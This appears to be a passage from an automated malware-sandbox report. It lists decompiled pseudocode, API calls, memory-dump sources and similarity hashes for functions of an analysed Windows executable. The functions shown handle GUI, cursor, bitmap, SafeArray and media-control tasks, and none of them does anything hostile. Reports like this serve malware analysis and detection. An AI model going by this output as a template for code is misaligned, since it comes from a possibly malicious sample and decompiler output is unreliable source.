                                                                                							_v12 = E00413FA4(_t22, 0);
                                                                                							_t24 =  *0x46b4b8; // 0x0
                                                                                							E00413E94(_t24, 0);
                                                                                							 *[fs:eax] = _t61;
                                                                                							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41b859, _t58);
                                                                                							_pop(_t51);
                                                                                							 *[fs:eax] = _t51;
                                                                                							SetEvent( *(_v12 + 4));
                                                                                						}
                                                                                						 *0x487a00 = 0;
                                                                                					}
                                                                                					_pop(_t48);
                                                                                					 *[fs:eax] = _t48;
                                                                                					_push(E0041B8B1);
                                                                                					_push(0x487a04);
                                                                                					L00406988();
                                                                                					return 0;
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B799
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B7A8
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A04,?,?,00000000), ref: 0041B7E3
                                                                                • SetEvent.KERNEL32(?,?,00487A04,?,?,00000000), ref: 0041B877
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A04,0041B8B1,00487A04,?,?,00000000), ref: 0041B8A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                                • String ID: 0pH
                                                                                • API String ID: 130076905-2350025942
                                                                                • Opcode ID: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction ID: 700889da0211f51844b0ff2bdf32a2a153439616f77316e0530eecd999da22f0
                                                                                • Opcode Fuzzy Hash: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction Fuzzy Hash: 183107346042409FD301EF65DC95B9E7BE8EB49704F6184BAE401D77A1C77C9881CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E0043D56C(void* __eax) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v16;
                                                                                				intOrPtr* _t14;
                                                                                				intOrPtr* _t17;
                                                                                				char _t19;
                                                                                				intOrPtr* _t21;
                                                                                				void* _t23;
                                                                                				intOrPtr* _t26;
                                                                                				void* _t28;
                                                                                				intOrPtr _t37;
                                                                                				void* _t39;
                                                                                				intOrPtr _t47;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				intOrPtr _t52;
                                                                                
                                                                                				_t49 = _t51;
                                                                                				_t52 = _t51 + 0xfffffff4;
                                                                                				_t39 = __eax;
                                                                                				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                                                					return __eax;
                                                                                				} else {
                                                                                					_t14 =  *0x486b30; // 0x487a94
                                                                                					_t17 =  *0x486b30; // 0x487a94
                                                                                					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                                                					_push(_t19);
                                                                                					L00426088();
                                                                                					_v8 = _t19;
                                                                                					_push(_t49);
                                                                                					_push(0x43d62c);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t52;
                                                                                					_t21 =  *0x486dac; // 0x487c00
                                                                                					_t23 = E004536BC( *_t21,  *((short*)(__eax + 0x68)));
                                                                                					_t4 =  &_v8; // 0x43373a
                                                                                					E004260C0( *_t4, _t23);
                                                                                					_t26 =  *0x486dac; // 0x487c00
                                                                                					_t28 = E004536BC( *_t26,  *((short*)(_t39 + 0x68)));
                                                                                					_t6 =  &_v8; // 0x43373a
                                                                                					E004260C0( *_t6, _t28);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_t7 =  &_v8; // 0x43373a
                                                                                					_push( *_t7);
                                                                                					L00426114();
                                                                                					_push( &_v16);
                                                                                					_push(0);
                                                                                					L00426124();
                                                                                					_push(_v12);
                                                                                					_push(_v16);
                                                                                					_push(1);
                                                                                					_t11 =  &_v8; // 0x43373a
                                                                                					_push( *_t11);
                                                                                					L00426114();
                                                                                					_pop(_t47);
                                                                                					 *[fs:eax] = _t47;
                                                                                					_push(0x43d633);
                                                                                					_t12 =  &_v8; // 0x43373a
                                                                                					_t37 =  *_t12;
                                                                                					_push(_t37);
                                                                                					L00426090();
                                                                                					return _t37;
                                                                                				}
                                                                                			}




















                                                                                APIs
                                                                                • 73451AB0.COMCTL32(00000000), ref: 0043D59E
                                                                                  • Part of subcall function 004260C0: 73452140.COMCTL32(:7C,000000FF,00000000,0043D5CE,00000000,0043D62C,?,00000000), ref: 004260C4
                                                                                • 73451680.COMCTL32(:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5F2
                                                                                • 73451710.COMCTL32(00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5FD
                                                                                • 73451680.COMCTL32(:7C,00000001,?,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D610
                                                                                • 73451F60.COMCTL32(:7C,0043D633,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D626
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: 7345173451680$7345171073452140
                                                                                • String ID: :7C
                                                                                • API String ID: 821207058-2842626378
                                                                                • Opcode ID: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction ID: b36cca2bb7ba9923877a37914de756c133afd760673c161dd847c69dd507d15e
                                                                                • Opcode Fuzzy Hash: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction Fuzzy Hash: 11215E74B00214AFDB10EBA8DC82F6D73F8EB49B04F5104AAB914DB291DA75AE44CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E00426588(intOrPtr _a4, intOrPtr* _a8) {
                                                                                				void _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t29 = _a8;
                                                                                				_t27 = _a4;
                                                                                				if( *0x487ac1 != 0) {
                                                                                					_t24 = 0;
                                                                                					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t31 = _t29;
                                                                                						 *(_t31 + 0x24) = 1;
                                                                                						if( *_t31 >= 0x4c) {
                                                                                							_push("DISPLAY");
                                                                                							_push(_t31 + 0x28);
                                                                                							L00406A28();
                                                                                						}
                                                                                						_t24 = 1;
                                                                                					}
                                                                                				} else {
                                                                                					_t26 =  *0x487aa8; // 0x426588
                                                                                					 *0x487aa8 = E00426184(5, _t23, _t26, _t27, _t29);
                                                                                					_t24 =  *0x487aa8(_t27, _t29);
                                                                                				}
                                                                                				return _t24;
                                                                                			}















                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004265E0
                                                                                • GetSystemMetrics.USER32 ref: 004265F5
                                                                                • GetSystemMetrics.USER32 ref: 00426600
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042662A
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoA
                                                                                • API String ID: 2545840971-1370492664
                                                                                • Opcode ID: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction ID: 4e2d9c879a4ed814bed1cbc42e39869fa7f5999004cea3bfa7235e91a67f31a5
                                                                                • Opcode Fuzzy Hash: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction Fuzzy Hash: 7C11E131704320AFD720CF64AC44BAFF7E8EB05710F51082EED4997680DBB4A9548BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E00422F84(int __eax, void* __ecx, intOrPtr __edx) {
                                                                                				intOrPtr _v8;
                                                                                				int _v12;
                                                                                				struct HDC__* _v16;
                                                                                				void* _v20;
                                                                                				struct tagRGBQUAD _v1044;
                                                                                				int _t16;
                                                                                				struct HDC__* _t18;
                                                                                				int _t31;
                                                                                				int _t34;
                                                                                				intOrPtr _t41;
                                                                                				void* _t43;
                                                                                				void* _t46;
                                                                                				void* _t48;
                                                                                				intOrPtr _t49;
                                                                                
                                                                                				_t16 = __eax;
                                                                                				_t46 = _t48;
                                                                                				_t49 = _t48 + 0xfffffbf0;
                                                                                				_v8 = __edx;
                                                                                				_t43 = __eax;
                                                                                				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                                                					L5:
                                                                                					return _t16;
                                                                                				} else {
                                                                                					_t16 = E00420950(_v8, 0xff,  &_v1044);
                                                                                					_t34 = _t16;
                                                                                					if(_t34 == 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_push(0);
                                                                                						L00406E20();
                                                                                						_v12 = _t16;
                                                                                						_t18 = _v12;
                                                                                						_push(_t18);
                                                                                						L00406A58();
                                                                                						_v16 = _t18;
                                                                                						_v20 = SelectObject(_v16, _t43);
                                                                                						_push(_t46);
                                                                                						_push(0x423033);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t49;
                                                                                						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                                                                						_pop(_t41);
                                                                                						 *[fs:eax] = _t41;
                                                                                						_push(0x42303a);
                                                                                						SelectObject(_v16, _v20);
                                                                                						DeleteDC(_v16);
                                                                                						_t31 = _v12;
                                                                                						_push(_t31);
                                                                                						_push(0);
                                                                                						L00407080();
                                                                                						return _t31;
                                                                                					}
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                  • Part of subcall function 00420950: GetObjectA.GDI32(00000000,00000004), ref: 00420967
                                                                                  • Part of subcall function 00420950: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,0042328E,00000000,004233E4,?,00000000), ref: 0042098A
                                                                                • 72E7AC50.USER32(00000000), ref: 00422FC2
                                                                                • 72E7A590.GDI32(?,00000000), ref: 00422FCE
                                                                                • SelectObject.GDI32(?), ref: 00422FDB
                                                                                • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00423033,?,?,?,?,00000000), ref: 00422FFF
                                                                                • SelectObject.GDI32(?,?), ref: 00423019
                                                                                • DeleteDC.GDI32(?), ref: 00423022
                                                                                • 72E7B380.USER32(00000000,?,?,?,?,0042303A,?,00000000,00423033,?,?,?,?,00000000), ref: 0042302D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                • String ID:
                                                                                • API String ID: 980243606-0
                                                                                • Opcode ID: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction ID: cdd620e072040bb66a836ce6190bb65582b2fad91901bccb33566f50f955587f
                                                                                • Opcode Fuzzy Hash: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction Fuzzy Hash: 3D1163B1E00219ABDB10EFE9DC51AAEB7BCEB09344F4144BAF514F7281D67CAE504B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E004536E4(long __eax, void* __ecx, short __edx) {
                                                                                				struct tagPOINT _v24;
                                                                                				long _t7;
                                                                                				long _t12;
                                                                                				long _t19;
                                                                                				void* _t21;
                                                                                				struct HWND__* _t27;
                                                                                				short _t28;
                                                                                				void* _t30;
                                                                                				struct tagPOINT* _t31;
                                                                                
                                                                                				_t21 = __ecx;
                                                                                				_t7 = __eax;
                                                                                				_t31 = _t30 + 0xfffffff8;
                                                                                				_t28 = __edx;
                                                                                				_t19 = __eax;
                                                                                				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                                                					L6:
                                                                                					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                                                				} else {
                                                                                					 *((short*)(__eax + 0x44)) = __edx;
                                                                                					if(__edx != 0) {
                                                                                						L5:
                                                                                						_t7 = SetCursor(E004536BC(_t19, _t28));
                                                                                						goto L6;
                                                                                					} else {
                                                                                						GetCursorPos(_t31);
                                                                                						_push(_v24.y);
                                                                                						_t27 = WindowFromPoint(_v24);
                                                                                						if(_t27 == 0) {
                                                                                							goto L5;
                                                                                						} else {
                                                                                							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                                                							if(_t12 != GetCurrentThreadId()) {
                                                                                								goto L5;
                                                                                							} else {
                                                                                								_t7 = SendMessageA(_t27, 0x20, _t27, E004071E0(SendMessageA(_t27, 0x84, 0, E00407270(_t31, _t21)), 0x200));
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t7;
                                                                                			}

                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004536FF
                                                                                • WindowFromPoint.USER32(?,?), ref: 0045370C
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045371A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453721
                                                                                • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045373A
                                                                                • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00453751
                                                                                • SetCursor.USER32(00000000), ref: 00453763
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction ID: d50399b3e599f5152306f37c222da6bd6a6c0ddd4f97c88b5f6b33df3f17dc2d
                                                                                • Opcode Fuzzy Hash: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction Fuzzy Hash: 1B01D4A670430036D6253A364D86F3F25989B85B96F10413FBA04BA2C3EA3D9D08536E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E0040C364(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                                				char _v260;
                                                                                				char _v768;
                                                                                				char _v772;
                                                                                				short* _v776;
                                                                                				intOrPtr _v780;
                                                                                				char _v784;
                                                                                				signed int _v788;
                                                                                				signed short* _v792;
                                                                                				char _v796;
                                                                                				char _v800;
                                                                                				intOrPtr* _v804;
                                                                                				void* __ebp;
                                                                                				signed char _t44;
                                                                                				signed int _t49;
                                                                                				signed short* _t56;
                                                                                				char* _t58;
                                                                                				void* _t64;
                                                                                				intOrPtr* _t69;
                                                                                				signed short* _t76;
                                                                                				signed short* _t79;
                                                                                				intOrPtr _t88;
                                                                                				void* _t90;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				void* _t94;
                                                                                				intOrPtr* _t102;
                                                                                				void* _t106;
                                                                                				intOrPtr _t107;
                                                                                				char* _t108;
                                                                                				void* _t109;
                                                                                
                                                                                				_v780 = __ecx;
                                                                                				_v776 = __eax;
                                                                                				_t44 =  *((intOrPtr*)(__edx));
                                                                                				_t97 = _t44 & 0x00000fff;
                                                                                				if((_t44 & 0x00000fff) != 0xc) {
                                                                                					_push(__edx);
                                                                                					_t88 = _v776;
                                                                                					_push(_t88);
                                                                                					L0040C060();
                                                                                					return _t88;
                                                                                				}
                                                                                				if((_t44 & 0x00000040) == 0) {
                                                                                					_v792 =  *((intOrPtr*)(__edx + 8));
                                                                                				} else {
                                                                                					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
                                                                                				}
                                                                                				_v788 =  *_v792 & 0x0000ffff;
                                                                                				_t90 = _v788 - 1;
                                                                                				if(_t90 >= 0) {
                                                                                					_t94 = _t90 + 1;
                                                                                					_t106 = 0;
                                                                                					_t108 =  &_v772;
                                                                                					do {
                                                                                						_v804 = _t108;
                                                                                						_push(_v804 + 4);
                                                                                						_t16 = _t106 + 1; // 0x1
                                                                                						_t76 = _v792;
                                                                                						_push(_t76);
                                                                                						L0040C088();
                                                                                						if(_t76 != 0) {
                                                                                							E00402888(0x14);
                                                                                						}
                                                                                						_push( &_v784);
                                                                                						_t19 = _t106 + 1; // 0x1
                                                                                						_t79 = _v792;
                                                                                						_push(_t79);
                                                                                						L0040C090();
                                                                                						if(_t79 != 0) {
                                                                                							E00402888(0x14);
                                                                                						}
                                                                                						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                						_t106 = _t106 + 1;
                                                                                						_t108 = _t108 + 8;
                                                                                						_t94 = _t94 - 1;
                                                                                					} while (_t94 != 0);
                                                                                				}
                                                                                				_push( &_v772);
                                                                                				_t49 = _v788;
                                                                                				_push(_t49);
                                                                                				_push(0xc);
                                                                                				L0040C078();
                                                                                				_t107 = _t49;
                                                                                				if(_t107 == 0) {
                                                                                					E00402888(0x12);
                                                                                				}
                                                                                				E0040C224(_v776, _t97);
                                                                                				 *_v776 = 0x200c;
                                                                                				 *((intOrPtr*)(_v776 + 8)) = _t107;
                                                                                				_t92 = _v788 - 1;
                                                                                				if(_t92 >= 0) {
                                                                                					_t93 = _t92 + 1;
                                                                                					_t69 =  &_v768;
                                                                                					_t102 =  &_v260;
                                                                                					do {
                                                                                						 *_t102 =  *_t69;
                                                                                						_t102 = _t102 + 4;
                                                                                						_t69 = _t69 + 8;
                                                                                						_t93 = _t93 - 1;
                                                                                					} while (_t93 != 0);
                                                                                					do {
                                                                                						goto L17;
                                                                                					} while (_t64 != 0);
                                                                                					return _t64;
                                                                                				}
                                                                                				L17:
                                                                                				_push( &_v796);
                                                                                				_push( &_v260);
                                                                                				_t56 = _v792;
                                                                                				_push(_t56);
                                                                                				L0040C0A8();
                                                                                				if(_t56 != 0) {
                                                                                					E00402888(0x14);
                                                                                				}
                                                                                				_push( &_v800);
                                                                                				_t58 =  &_v260;
                                                                                				_push(_t58);
                                                                                				_push(_t107);
                                                                                				L0040C0A8();
                                                                                				if(_t58 != 0) {
                                                                                					E00402888(0x14);
                                                                                				}
                                                                                				_v780();
                                                                                				_t64 = E0040C308(_v788 - 1, _t109);
                                                                                			}

                                                                                0x0040c510

                                                                                APIs
                                                                                • VariantCopy.OLEAUT32(?), ref: 0040C394
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C3F9
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C41B
                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C45A
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C4C5
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C4E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                • String ID:
                                                                                • API String ID: 351091851-0
                                                                                • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction ID: e8cfbddb4b6d86e1814c4b1c7dcfa7253a557c948e887391303c1413b19c10f2
                                                                                • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction Fuzzy Hash: E6510D7590121DDBDB25DB59CD90BDAB3BCBB08304F4042EAEA09F7281D634AF858F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E0046A3B4(void* __eax) {
                                                                                				intOrPtr _v112;
                                                                                				intOrPtr _v116;
                                                                                				intOrPtr _v120;
                                                                                				intOrPtr _v124;
                                                                                				void* _v128;
                                                                                				void* _v140;
                                                                                				char _t53;
                                                                                				char _t57;
                                                                                				char _t61;
                                                                                				char _t65;
                                                                                				intOrPtr _t69;
                                                                                				intOrPtr _t76;
                                                                                				void* _t77;
                                                                                				long _t79;
                                                                                				long _t82;
                                                                                
                                                                                				_t77 = __eax;
                                                                                				_t79 = _t82;
                                                                                				 *(__eax + 0x2e8) = 0x102;
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 8;
                                                                                				mciSendCommandA( *(__eax + 0x2f2) & 0x0000ffff, 0x80b, 0x102, _t79);
                                                                                				_t53 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e3)) = _t53;
                                                                                				if(_t53 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000004;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 1;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t57 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e6)) = _t57;
                                                                                				if(_t57 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000008;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 7;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t61 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e5)) = _t61;
                                                                                				if(_t61 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000002;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 3;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t65 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e7)) = _t65;
                                                                                				if(_t65 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000010;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 4;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t69 =  *((intOrPtr*)(_t79 + 4));
                                                                                				if(_t69 == 0x207 || _t69 == 0x208 || _t69 == 0x203 || _t69 == 0x201) {
                                                                                					 *((char*)(_t77 + 0x2e4)) = 1;
                                                                                				}
                                                                                				if( *((char*)(_t77 + 0x2e4)) != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000001;
                                                                                				}
                                                                                				 *(_t77 + 0x2e8) = 0x20000;
                                                                                				 *((intOrPtr*)(_t77 + 0x304)) = mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x843, 0x20000,  &_v128);
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				 *((intOrPtr*)(_t77 + 0x310)) = _v116 - _v124;
                                                                                				_t76 = _v112 - _v120;
                                                                                				 *((intOrPtr*)(_t77 + 0x314)) = _t76;
                                                                                				return _t76;
                                                                                			}

                                                                                APIs
                                                                                • mciSendCommandA.WINMM(?,0000080B,00000102), ref: 0046A3DF
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A414
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A449
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A47E
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A4B3
                                                                                • mciSendCommandA.WINMM(?,00000843,00020000,?), ref: 0046A50C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CommandSend
                                                                                • String ID:
                                                                                • API String ID: 3079401599-0
